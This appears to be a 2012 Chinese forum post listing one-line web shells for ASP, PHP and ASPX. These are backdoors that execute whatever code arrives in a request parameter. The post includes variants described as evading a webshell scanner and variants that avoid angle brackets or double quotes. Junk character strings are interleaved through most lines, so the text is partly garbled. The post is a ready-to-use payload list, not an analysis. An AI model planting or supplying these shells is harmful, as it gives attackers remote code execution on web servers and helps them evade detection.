asp一句话 <%execute(request("1"))%>
- P8 E6 o* j, ]5 v, w8 ^
) m( N" @. a# p4 Z0 yphp一句话 <?php eval($_POST[1]);?> / C h) D4 ?* o- X: A( o2 c
; z7 @, x2 T9 D ~/ f
aspx一句话
; B: r+ n& B8 u+ {! X" X D* Z
' G7 f5 b. a9 `<script language="C#" runat="server">
/ O' _7 E" m8 f$ D. P: F2 c. O3 N% ?4 {4 i: ?9 ?; H/ \5 `" {
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
2 K) x9 M0 V1 M/ ~9 r! ?/ y- I
- B/ }, q; T0 D# d</script>
, u4 u' \( ^ H5 A9 n `
4 p O' x: H# n/ Y% k0 _9 L. a' b可以躲过雷客图的一句话。
9 {/ b4 O5 \3 S- P+ O3 W
, G- ~! x: }& c9 ]) | <%' m$ A2 T2 K3 f# f8 s1 s1 N
' R" h I {1 o2 H4 k
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")" I7 s& O) \) _5 t
. @& q; U3 f) u0 p
ms.Language="VBScript"/ G* b( J# G( m, F' G8 a
( D' ^9 W1 O. p2 n ms.AddObject "Response", Response
6 t5 A$ r/ u9 v- i- j4 L8 O* w
/ U; R" d- W7 }" G1 M ms.AddObject "request", request# ^6 m' u2 v7 G X
+ e# D! q2 I' Y$ R
ms.ExecuteStatement("ev"&"al(request(""1""))")3 I) F' g+ ~2 B: ~9 R
, O$ e: b* t* H% b& U, S
%># j& y) t7 i- S% w3 f
$ K/ h6 S! [% y# } 不用'<,>'的asp一句话' N& @4 A! v9 w! v, a1 I
: D5 U3 T# m- M" }( U" ?6 b <script language=VBScript runat=server>execute request("1")</script>5 d; S' W- @8 \% q: D
( s6 j- r+ T4 H% f1 w& H 不用双引号的一句话。, V3 ]$ F$ B* V, U( I4 t* h" _
4 Z* ^1 z+ l- B k! V <%eval request(chr(35))%>! ~6 t3 F& G$ ~' A- w
|
发表于 2012-9-23 14:36:09
收藏
支持
反对